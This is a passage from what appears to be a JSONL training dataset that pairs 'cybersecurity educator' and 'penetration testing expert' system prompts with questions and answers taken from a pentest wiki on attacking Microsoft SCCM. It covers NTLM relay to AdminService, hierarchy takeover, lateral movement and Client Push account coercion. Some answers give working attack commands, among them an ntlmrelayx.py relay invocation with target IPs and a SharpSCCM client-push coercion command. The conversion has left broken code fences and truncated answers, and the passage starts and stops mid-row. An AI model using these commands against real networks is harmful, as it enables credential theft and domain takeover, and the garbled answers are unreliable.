Microsoft's update notes.\n\nThis technique allows an attacker to take over the SCCM hierarchy by relaying coerced NTLM authentication from site servers to remote SMS Providers via the AdminService API. The SMS Provider's AdminService REST API uses Microsoft Negotiate for authentication and, in default configurations prior to version 2509, was vulnerable to NTLM relay attacks.\n\n> [!TIP]\n> For detailed requirements, defensive strategies, and practical implementation steps, refer to the Relay to the HTTP API AdminService section in the site takeover article, TAKEOVER-5, and the article \"Site Takeover via SCCM's AdminService API\" by Garrett Foster."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about SCCM Hierarchy takeover - TAKEOVER-5: NTLM coercion and relay to AdminService", "response": "> [!CAUTION]\n> This technique only works on Configuration Manager versions prior to 2509. Version 2509 and later reject NTLM authentication at the AdminService. For more details, see Microsoft's update notes.\n\nThis technique allows an attacker to take over the SCCM hierarchy by relaying coerced NTLM authentication from site servers to remote SMS Providers via the AdminService API. The SMS Provider's AdminService REST API uses Microsoft Negotiate for authentication and, in default configurations prior to version 2509, was vulnerable to NTLM relay attacks.\n\n> [!TIP]\n> For detailed requirements, defensive strategies, and practical implementation steps, refer to the Relay to the HTTP API AdminService section in the site takeover article, TAKEOVER-5, and the article \"Site Takeover via SCCM's AdminService API\" by Garrett Foster.", "metadata": {"corpus_index": 1032, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/hierarchy-takeover.md", "page_title": "SCCM Hierarchy takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform SCCM Hierarchy takeover - TAKEOVER-5: NTLM coercion and relay to AdminService?"}, {"role": "assistant", "content": "> [!CAUTION]\n> This technique only works on Configuration Manager versions prior to 2509. Version 2509 and later reject NTLM authentication at the AdminService. For more details, see Microsoft's update notes.\n\nThis technique allows an attacker to take over the SCCM hierarchy by relaying coerced NTLM authentication from site servers to remote SMS Providers via the AdminService API. The SMS Provider's AdminService REST API uses Microsoft Negotiate for authentication and, in default configurations prior to version 2509, was vulnerable to NTLM relay attacks.\n\n> [!TIP]\n> For detailed requirements, defensive strategies, and practical implementation steps, refer to the Relay to the HTTP API AdminService section in the site takeover article, TAKEOVER-5, and the article \"Site Takeover via SCCM's AdminService API\" by Garrett Foster."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform SCCM Hierarchy takeover - TAKEOVER-5: NTLM coercion and relay to AdminService?", "response": "> [!CAUTION]\n> This technique only works on Configuration Manager versions prior to 2509. Version 2509 and later reject NTLM authentication at the AdminService. For more details, see Microsoft's update notes.\n\nThis technique allows an attacker to take over the SCCM hierarchy by relaying coerced NTLM authentication from site servers to remote SMS Providers via the AdminService API. The SMS Provider's AdminService REST API uses Microsoft Negotiate for authentication and, in default configurations prior to version 2509, was vulnerable to NTLM relay attacks.\n\n> [!TIP]\n> For detailed requirements, defensive strategies, and practical implementation steps, refer to the Relay to the HTTP API AdminService section in the site takeover article, TAKEOVER-5, and the article \"Site Takeover via SCCM's AdminService API\" by Garrett Foster.", "metadata": {"corpus_index": 1032, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/hierarchy-takeover.md", "page_title": "SCCM Hierarchy takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Lateral movement - Theory?"}, {"role": "assistant", "content": "Since the main goal of SCCM is to deploy applications and services on the managed assets of the Active Directory, it is also a pretty good candidate to move latteraly on the network. With administrative rights on the primary site server, this can be done by deploying applications and scripts on the targets or coercing clients' authentication.\n\nAdditionally, SCCM permits to enumerate many data on the ressources. Among all the services offered by SCCM to the administrator, there is one named CMPivot. This service, located on the MP server, can enumerate all the resources of a computer or computer collection (installed software, local administrators, hardware specification, etc.), and perform administrative tasks on them. It uses a HTTP REST API, named AdminService, provided by the SMS Provider server.\n\nFinally, as indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\nThis means that there is no security boundary between SCCM sites in a same hierarchy, and being able to takeover one SCCM site implicates to takeover all the others."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Lateral movement - Theory?", "response": "Since the main goal of SCCM is to deploy applications and services on the managed assets of the Active Directory, it is also a pretty good candidate to move latteraly on the network. With administrative rights on the primary site server, this can be done by deploying applications and scripts on the targets or coercing clients' authentication.\n\nAdditionally, SCCM permits to enumerate many data on the ressources. Among all the services offered by SCCM to the administrator, there is one named CMPivot. This service, located on the MP server, can enumerate all the resources of a computer or computer collection (installed software, local administrators, hardware specification, etc.), and perform administrative tasks on them. It uses a HTTP REST API, named AdminService, provided by the SMS Provider server.\n\nFinally, as indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\nThis means that there is no security boundary between SCCM sites in a same hierarchy, and being able to takeover one SCCM site implicates to takeover all the others.", "metadata": {"corpus_index": 1033, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Lateral movement - Theory"}, {"role": "assistant", "content": "Since the main goal of SCCM is to deploy applications and services on the managed assets of the Active Directory, it is also a pretty good candidate to move latteraly on the network. With administrative rights on the primary site server, this can be done by deploying applications and scripts on the targets or coercing clients' authentication.\n\nAdditionally, SCCM permits to enumerate many data on the ressources. Among all the services offered by SCCM to the administrator, there is one named CMPivot. This service, located on the MP server, can enumerate all the resources of a computer or computer collection (installed software, local administrators, hardware specification, etc.), and perform administrative tasks on them. It uses a HTTP REST API, named AdminService, provided by the SMS Provider server.\n\nFinally, as indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\nThis means that there is no security boundary between SCCM sites in a same hierarchy, and being able to takeover one SCCM site implicates to takeover all the others."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Lateral movement - Theory", "response": "Since the main goal of SCCM is to deploy applications and services on the managed assets of the Active Directory, it is also a pretty good candidate to move latteraly on the network. With administrative rights on the primary site server, this can be done by deploying applications and scripts on the targets or coercing clients' authentication.\n\nAdditionally, SCCM permits to enumerate many data on the ressources. Among all the services offered by SCCM to the administrator, there is one named CMPivot. This service, located on the MP server, can enumerate all the resources of a computer or computer collection (installed software, local administrators, hardware specification, etc.), and perform administrative tasks on them. It uses a HTTP REST API, named AdminService, provided by the SMS Provider server.\n\nFinally, as indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\nThis means that there is no security boundary between SCCM sites in a same hierarchy, and being able to takeover one SCCM site implicates to takeover all the others.", "metadata": {"corpus_index": 1033, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Lateral movement - Admin & Special Account Enumeration?"}, {"role": "assistant", "content": "Administrative privileges over the SCCM Management Point (MP) are required to query the MP's WMI database for admin and special accounts.\n\n> [!TIP]\n> Read the enumeration article for detailed information on enumerating admin and special accounts."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Lateral movement - Admin & Special Account Enumeration?", "response": "Administrative privileges over the SCCM Management Point (MP) are required to query the MP's WMI database for admin and special accounts.\n\n> [!TIP]\n> Read the enumeration article for detailed information on enumerating admin and special accounts.", "metadata": {"corpus_index": 1034, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Lateral movement - Admin & Special Account Enumeration during a pentest?"}, {"role": "assistant", "content": "Administrative privileges over the SCCM Management Point (MP) are required to query the MP's WMI database for admin and special accounts.\n\n> [!TIP]\n> Read the enumeration article for detailed information on enumerating admin and special accounts."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Lateral movement - Admin & Special Account Enumeration during a pentest?", "response": "Administrative privileges over the SCCM Management Point (MP) are required to query the MP's WMI database for admin and special accounts.\n\n> [!TIP]\n> Read the enumeration article for detailed information on enumerating admin and special accounts.", "metadata": {"corpus_index": 1034, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Lateral movement - Applications and scripts deployment"}, {"role": "assistant", "content": "With administrative rights on the primary site server, applications and scripts can be deployed on target devices to move laterally across the network.\n\n> [!TIP]\n> Read the deployment article for detailed information on deploying applications and scripts via SCCM."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Lateral movement - Applications and scripts deployment", "response": "With administrative rights on the primary site server, applications and scripts can be deployed on target devices to move laterally across the network.\n\n> [!TIP]\n> Read the deployment article for detailed information on deploying applications and scripts via SCCM.", "metadata": {"corpus_index": 1035, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Lateral movement - Applications and scripts deployment?"}, {"role": "assistant", "content": "With administrative rights on the primary site server, applications and scripts can be deployed on target devices to move laterally across the network.\n\n> [!TIP]\n> Read the deployment article for detailed information on deploying applications and scripts via SCCM."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Lateral movement - Applications and scripts deployment?", "response": "With administrative rights on the primary site server, applications and scripts can be deployed on target devices to move laterally across the network.\n\n> [!TIP]\n> Read the deployment article for detailed information on deploying applications and scripts via SCCM.", "metadata": {"corpus_index": 1035, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Lateral movement - AdminService API?"}, {"role": "assistant", "content": "The AdminService API can be used to interact directly with SCCM resources for post-exploitation purposes, without using CMPivot.\n\n> [!TIP]\n> Read the AdminService API article for detailed information on using the AdminService API."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Lateral movement - AdminService API?", "response": "The AdminService API can be used to interact directly with SCCM resources for post-exploitation purposes, without using CMPivot.\n\n> [!TIP]\n> Read the AdminService API article for detailed information on using the AdminService API.", "metadata": {"corpus_index": 1036, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Lateral movement - AdminService API"}, {"role": "assistant", "content": "The AdminService API can be used to interact directly with SCCM resources for post-exploitation purposes, without using CMPivot.\n\n> [!TIP]\n> Read the AdminService API article for detailed information on using the AdminService API."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Lateral movement - AdminService API", "response": "The AdminService API can be used to interact directly with SCCM resources for post-exploitation purposes, without using CMPivot.\n\n> [!TIP]\n> Read the AdminService API article for detailed information on using the AdminService API.", "metadata": {"corpus_index": 1036, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Lateral movement - SCCM Hierarchy takeover?"}, {"role": "assistant", "content": "By default, when a new user is promoted to any SCCM administrative role on a primary site server, the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\n> [!TIP]\n> Read the hierarchy takeover article for detailed information on SCCM hierarchy takeover."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Lateral movement - SCCM Hierarchy takeover?", "response": "By default, when a new user is promoted to any SCCM administrative role on a primary site server, the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\n> [!TIP]\n> Read the hierarchy takeover article for detailed information on SCCM hierarchy takeover.", "metadata": {"corpus_index": 1037, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Lateral movement - SCCM Hierarchy takeover?"}, {"role": "assistant", "content": "By default, when a new user is promoted to any SCCM administrative role on a primary site server, the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\n> [!TIP]\n> Read the hierarchy takeover article for detailed information on SCCM hierarchy takeover."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Lateral movement - SCCM Hierarchy takeover?", "response": "By default, when a new user is promoted to any SCCM administrative role on a primary site server, the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\n> [!TIP]\n> Read the hierarchy takeover article for detailed information on SCCM hierarchy takeover.", "metadata": {"corpus_index": 1037, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/index.md", "page_title": "Lateral movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Client Push account authentication coercion - Theory work?"}, {"role": "assistant", "content": "If SCCM is deployed via Client Push Accounts, it is possible, from a compromised SCCM client, to coerce the Client Push Account into authenticating to an arbitrary remote resource. It is then possible to retrieve NTLM authentication data in order to crack the account's password or relay the data to other services. Client Push Accounts are privileged as they are required to have local administrator rights on workstations on which they deploy the SCCM client.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to client push account coercion in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - ELEVATE-2: Relay Client Push Installation\n> - ELEVATE-3: Relay Client Push Installation (with AD System Discovery)\n> - COERCE-2: CcmExec Coercion\n\n> [!TIP]\n> In some case, the \"Client Push Accounts\" could even be part of the Domain Admins group, leading to a complete takeover of the domain."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Client Push account authentication coercion - Theory work?", "response": "If SCCM is deployed via Client Push Accounts, it is possible, from a compromised SCCM client, to coerce the Client Push Account into authenticating to an arbitrary remote resource. It is then possible to retrieve NTLM authentication data in order to crack the account's password or relay the data to other services. Client Push Accounts are privileged as they are required to have local administrator rights on workstations on which they deploy the SCCM client.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to client push account coercion in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - ELEVATE-2: Relay Client Push Installation\n> - ELEVATE-3: Relay Client Push Installation (with AD System Discovery)\n> - COERCE-2: CcmExec Coercion\n\n> [!TIP]\n> In some case, the \"Client Push Accounts\" could even be part of the Domain Admins group, leading to a complete takeover of the domain.", "metadata": {"corpus_index": 1038, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Client Push account authentication coercion - Theory during a pentest?"}, {"role": "assistant", "content": "If SCCM is deployed via Client Push Accounts, it is possible, from a compromised SCCM client, to coerce the Client Push Account into authenticating to an arbitrary remote resource. It is then possible to retrieve NTLM authentication data in order to crack the account's password or relay the data to other services. Client Push Accounts are privileged as they are required to have local administrator rights on workstations on which they deploy the SCCM client.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to client push account coercion in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - ELEVATE-2: Relay Client Push Installation\n> - ELEVATE-3: Relay Client Push Installation (with AD System Discovery)\n> - COERCE-2: CcmExec Coercion\n\n> [!TIP]\n> In some case, the \"Client Push Accounts\" could even be part of the Domain Admins group, leading to a complete takeover of the domain."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Client Push account authentication coercion - Theory during a pentest?", "response": "If SCCM is deployed via Client Push Accounts, it is possible, from a compromised SCCM client, to coerce the Client Push Account into authenticating to an arbitrary remote resource. It is then possible to retrieve NTLM authentication data in order to crack the account's password or relay the data to other services. Client Push Accounts are privileged as they are required to have local administrator rights on workstations on which they deploy the SCCM client.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to client push account coercion in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - ELEVATE-2: Relay Client Push Installation\n> - ELEVATE-3: Relay Client Push Installation (with AD System Discovery)\n> - COERCE-2: CcmExec Coercion\n\n> [!TIP]\n> In some case, the \"Client Push Accounts\" could even be part of the Domain Admins group, leading to a complete takeover of the domain.", "metadata": {"corpus_index": 1038, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Client Push account authentication coercion - Authentication Coercion via Client Push Installation?"}, {"role": "assistant", "content": "The client push installation can be triggered forcefully or - if you're lucky - your compromised machine might not have the SCCM client installed, which mean you could capture the client push installation as it occurs."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Client Push account authentication coercion - Authentication Coercion via Client Push Installation?", "response": "The client push installation can be triggered forcefully or - if you're lucky - your compromised machine might not have the SCCM client installed, which mean you could capture the client push installation as it occurs.", "metadata": {"corpus_index": 1039, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Client Push account authentication coercion - Authentication Coercion via Client Push Installation during a pentest?"}, {"role": "assistant", "content": "The client push installation can be triggered forcefully or - if you're lucky - your compromised machine might not have the SCCM client installed, which mean you could capture the client push installation as it occurs."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Client Push account authentication coercion - Authentication Coercion via Client Push Installation during a pentest?", "response": "The client push installation can be triggered forcefully or - if you're lucky - your compromised machine might not have the SCCM client installed, which mean you could capture the client push installation as it occurs.", "metadata": {"corpus_index": 1039, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Client Push account authentication coercion - Option 2: Forcefully \"coerce\" the Client Push Installation work?"}, {"role": "assistant", "content": "> [!WARNING]\n> One should read this blog before continuing, as this attack might leave traces behind and might mess things up with the SCCM environment."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Client Push account authentication coercion - Option 2: Forcefully \"coerce\" the Client Push Installation work?", "response": "> [!WARNING]\n> One should read this blog before continuing, as this attack might leave traces behind and might mess things up with the SCCM environment.", "metadata": {"corpus_index": 1040, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Client Push account authentication coercion - Option 2: Forcefully \"coerce\" the Client Push Installation?"}, {"role": "assistant", "content": "> [!WARNING]\n> One should read this blog before continuing, as this attack might leave traces behind and might mess things up with the SCCM environment."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Client Push account authentication coercion - Option 2: Forcefully \"coerce\" the Client Push Installation?", "response": "> [!WARNING]\n> One should read this blog before continuing, as this attack might leave traces behind and might mess things up with the SCCM environment.", "metadata": {"corpus_index": 1040, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Client Push account authentication coercion - Step 1: prepare coercion listener"}, {"role": "assistant", "content": "Note that you could either capture & crack received credentials or relay them to a suitable target system (or both).\n\n```sh"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Client Push account authentication coercion - Step 1: prepare coercion listener", "response": "Note that you could either capture & crack received credentials or relay them to a suitable target system (or both).\n\n```sh", "metadata": {"corpus_index": 1041, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Client Push account authentication coercion - Step 1: prepare coercion listener"}, {"role": "assistant", "content": "Note that you could either capture & crack received credentials or relay them to a suitable target system (or both).\n\n```sh"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Client Push account authentication coercion - Step 1: prepare coercion listener", "response": "Note that you could either capture & crack received credentials or relay them to a suitable target system (or both).\n\n```sh", "metadata": {"corpus_index": 1041, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Client Push account authentication coercion - Relay using ntlmrelayx.py"}, {"role": "assistant", "content": "ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179\n``\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Client Push account authentication coercion - Relay using ntlmrelayx.py", "response": "ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179\n``\n``powershell", "metadata": {"corpus_index": 1042, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Client Push account authentication coercion - Relay using ntlmrelayx.py?"}, {"role": "assistant", "content": "ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179\n``\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Client Push account authentication coercion - Relay using ntlmrelayx.py?", "response": "ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179\n``\n``powershell", "metadata": {"corpus_index": 1042, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does If admin access over Management Point (MP) work?"}, {"role": "assistant", "content": "SharpSCCM.exe invoke client-push -t $TARGET --as-admin"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does If admin access over Management Point (MP) work?", "response": "SharpSCCM.exe invoke client-push -t $TARGET --as-admin", "metadata": {"corpus_index": 1043, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for If admin access over Management Point (MP)"}, {"role": 